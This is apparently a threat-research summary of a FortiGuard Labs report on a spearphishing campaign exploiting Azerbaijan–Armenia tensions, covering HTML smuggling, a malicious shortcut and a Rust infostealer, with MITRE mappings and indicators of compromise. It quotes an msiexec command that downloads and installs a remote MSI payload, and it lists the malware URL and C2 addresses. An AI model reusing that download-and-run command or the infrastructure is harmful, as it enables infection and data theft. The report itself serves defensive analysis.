Threat Research

Threat Actors Exploit the Tensions Between Azerbaijan and Armenia | FortiGuard Labs

Fortinet

FortiGuard Labs discovered a targeted spearphishing campaign exploiting Azerbaijan–Armenia tensions that uses HTML smuggling in an HTML memo to deliver a password-protected archive which contains a malicious .LNK that launches an MSI via msiexec. The MSI installs a Rust-based infostealer named “Windows Defender Health Check” that achieves persistence via a scheduled task, collects system info and environment variables, checks for proxies, and exfiltrates encrypted data to C2 servers in the 78.135.73.0/24 subnet. #WindowsDefenderHealthcheck #Azerbaijan

Keypoints

  • Spearphishing memo in HTML uses HTML smuggling to auto-deliver a password-protected ZIP containing a decoy image and a malicious .LNK shortcut.
  • The .LNK executes msiexec to download and run an MSI from a Dropbox URL, showing a phony image while installing malware in the background.
  • The installed payload (Windows Defender Health Check) is a Rust-based infostealer placed in %APPDATA%Windows Defender Health CheckWindowsDefenderHealthcheck.exe.
  • Persistence is achieved by creating a temporary XML (24rp.xml) to register a scheduled task, then deleting the XML to reduce forensic artifacts; the malware also randomizes sleep intervals for stealth.
  • The infostealer gathers system information, environment variables, and checks for proxy settings before issuing an encrypted POST to a C2 at 78[.]135.73.140:35667.
  • Telemetry links the C2 to additional IPs in the same /24 (78[.]135.73.147, .162, .183, .188), and a Colombia-based IP was observed connecting to 78[.]135.73.188—potentially a VPN/mobile hotspot used by the actor.
  • Fortinet provides detections (e.g., W64/Agent.EO!tr.pws, LNK/Agent.360A!tr) and classifies the download URLs as malicious via FortiGuard services.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Use of an HTML memo to target management teams (‘infected memo pretending to come from the current president of a company in Azerbaijan’).
  • [T1027.006] Obfuscated Files or Information: HTML Smuggling – The memo is in HTML and uses HTML smuggling to automatically deliver a password-protected archive (‘The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive.’).
  • [T1218] Signed Binary Proxy Execution – Execution of msiexec to install a remote MSI downloaded from Dropbox (‘….WindowsSystem32msiexec.exe /i “https://dl[.]dropboxusercontent[.]com/…/karabakh.jpg.msi?…”).’)
  • [T1053.005] Scheduled Task/Job – Creation of a temporary XML file used to register a scheduled task for persistence (‘a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.’).
  • [T1082] System Information Discovery – Malware collects basic computer information and environment variables (‘gathering basic computer information’ and ‘collects a list of environment variables’).
  • [T1049] System Network Connections Discovery – Malware checks for proxy servers to route its traffic (‘takes an extra step to check for any proxy servers in use’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Exfiltration of encrypted stolen data via HTTP POST to a C2 server (”POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.”).

Indicators of Compromise

  • [File hash] Malware and lure samples – 5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB (WindowsDefenderHealthcheck.exe), 35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5 (karabakh.jpg.msi), and 3 more hashes.
  • [File name] Malicious and decoy filenames – WindowsDefenderHealthcheck.exe, 1.KARABAKH.jpg.lnk (decoy shortcut pointing to MSI).
  • [URL] Download location used by msiexec – https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0 (MSI download).
  • [IP addresses] C2 and related infrastructure – 78[.]135.73.140 (primary C2 on port 35667), and other hosts in subnet 78[.]135.73.147, .162, .183, .188 (additional servers observed).

The technical attack chain begins with an HTML-formatted spearphishing memo that leverages HTML smuggling to drop a password-protected ZIP. The archive contains several legitimate images and one deceptive .LNK file; when a user opens the shortcut it runs msiexec to fetch a remote MSI hosted on a Dropbox URL. The MSI presents a phony image to the user while simultaneously installing a hidden payload.

The installed payload is a Rust-written infostealer placed at %APPDATA%Windows Defender Health CheckWindowsDefenderHealthcheck.exe. For persistence it creates a temporary file named 24rp.xml to register a scheduled task and then deletes the XML to reduce traces. The malware also includes anti-detection timing (random sleep intervals) to execute after hours.

Functionally the infostealer collects basic system information, enumerates environment variables, checks for proxy settings (and adapts its routing), then encrypts and sends the stolen data via an HTTP POST to C2 78[.]135.73.140 on port 35667. Fortinet telemetry links the C2 to additional IPs in the same /24 (78[.]135.73.147, .162, .183, .188), and a Colombia IP was observed connecting to 78[.]135.73.188—potentially indicating actor use of a VPN or mobile hotspot. Fortinet provides AV signatures and web-filtering classifications for the samples and download URLs.

Read more: https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia